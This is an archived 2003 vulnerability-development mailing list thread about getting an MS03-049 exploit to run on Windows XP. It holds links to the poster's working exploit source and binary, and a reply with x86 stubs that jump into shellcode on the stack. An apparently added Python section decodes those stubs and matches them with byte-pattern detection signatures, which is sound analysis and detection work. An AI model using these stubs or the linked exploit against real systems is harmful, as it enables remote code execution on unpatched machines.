Vulnerability Development mailing list archives

Re: ms03-049 exploit xp sp0


From: "upb" <upb () email ee>
Date: Thu, 13 Nov 2003 02:22:18 +0200

heya.
The shortest way I know is:
00000000: EB14                         jmps        000000016
00000002: 832C2440                     sub         d,[esp],040 ;"@"
00000006: E8F5FFFFFF                   call        000000000

11 bytes :(
However, if you know that the code will be on the stack, you could do something like:
00000000: 83EC44                       sub         esp,044 ;"D"
00000003: FFE4                         jmp         esp

upb
----- Original Message ----- 
From: "wirepair" <wirepair () roguemail net>
To: <vuln-dev () securityfocus com>
Sent: Wednesday, November 12, 2003 11:03 PM
Subject: ms03-049 exploit xp sp0


lo all,
Well, I got xp sp0 to execute my code, but sp1 has a different stack
layout. After the return address, the data only has about 4 or 8
bytes (I can't remember and I'm too lazy to check because I've been
messing with this for the past 7 hours).
Since I have 4/8 bytes to work with, I'm contemplating doing some sort of
jmp / call and stuffing my shellcode in the beginning of the
buffer instead of tacking it on to the end like my current exploit.
Unfortunately my asm is still lacking and I am unsure about
the best way of making it jmp/call the address (without nulls and without
hardset stack addresses).
If you can offer any suggestions I would *greatly* appreciate it.
Anyway, here's my code: http://sh0dan.org/files/0349.cpp
or the exe: http://sh0dan.org/files/0349.exe. Remember this is SP0 only,
sp1 will definitely crash.
Thanks,
-wire
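The two stubs upb quotes are short enough to check by hand, but an analyst triaging a crash dump usually wants the displacement arithmetic and a byte-pattern match done mechanically. The following is an added Python example, not code from either poster: it decodes exactly the opcodes used in the quoted listings (short `jmp`, `call rel32`, `sub [esp],imm8`, `sub esp,imm8`, `jmp esp`) to confirm the targets shown in the listings, and then scans a constructed buffer for the two stub shapes as a detection signature. The byte strings are taken from the listings above; the scan buffer and the function names are my own.

```python
import re
import struct

# The two stubs from upb's reply, as raw bytes (transcribed from the listings).
STUB_SUB_CALL = bytes.fromhex("EB14" "832C2440" "E8F5FFFFFF")   # 11 bytes
STUB_SUB_JMP_ESP = bytes.fromhex("83EC44" "FFE4")               # 5 bytes


def decode_stub(code):
    """Decode the handful of x86 instructions the quoted stubs use.

    Returns a list of (mnemonic, operand) tuples; branch operands are
    resolved to absolute offsets within `code`, matching the listing's
    "jmps 16" and "call 0" columns. Anything else raises, so the decoder
    cannot silently misread unrelated bytes.
    """
    out = []
    i = 0
    while i < len(code):
        op = code[i]
        if op == 0xEB:                                   # jmp short rel8
            rel = struct.unpack_from("<b", code, i + 1)[0]
            out.append(("jmp", i + 2 + rel))             # target is relative to next insn
            i += 2
        elif op == 0xE8:                                 # call rel32
            rel = struct.unpack_from("<i", code, i + 1)[0]
            out.append(("call", i + 5 + rel))
            i += 5
        elif op == 0x83 and code[i + 1:i + 3] == b"\x2C\x24":  # sub dword [esp], imm8
            out.append(("sub [esp]", code[i + 3]))
            i += 4
        elif op == 0x83 and code[i + 1] == 0xEC:         # sub esp, imm8
            out.append(("sub esp", code[i + 2]))
            i += 3
        elif op == 0xFF and code[i + 1] == 0xE4:         # jmp esp
            out.append(("jmp esp", None))
            i += 2
        else:
            raise ValueError(f"unhandled opcode at offset {i}: {op:#04x}")
    return out


# Detection signatures for the two stub shapes. The immediates are wildcarded
# because only the opcode skeleton is stable across different buffer layouts.
SIGNATURES = [
    (re.compile(rb"\x83\xEC.\xFF\xE4", re.DOTALL), "sub esp,imm8; jmp esp"),
    (re.compile(rb"\xEB.\x83\x2C\x24.\xE8", re.DOTALL), "jmp short; sub [esp],imm8; call"),
]


def find_stack_pivot_stubs(buf):
    """Return (offset, label) for every signature hit in `buf`, in offset order."""
    hits = []
    for pattern, label in SIGNATURES:
        for m in pattern.finditer(buf):
            hits.append((m.start(), label))
    return sorted(hits)


if __name__ == "__main__":
    print(decode_stub(STUB_SUB_CALL))
    print(decode_stub(STUB_SUB_JMP_ESP))
    # Constructed sample: filler, then the jmp-esp stub, then more filler.
    sample = b"A" * 20 + STUB_SUB_JMP_ESP + b"B" * 5
    print(find_stack_pivot_stubs(sample))
```

Running it reproduces the listing: the short jump lands at offset 22 (0x16), the `call` lands back at offset 0, and the `jmp esp` stub is reported at offset 20 of the constructed buffer. The decoder is deliberately narrow; it is a verification aid for the bytes discussed in this thread, not a general disassembler.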


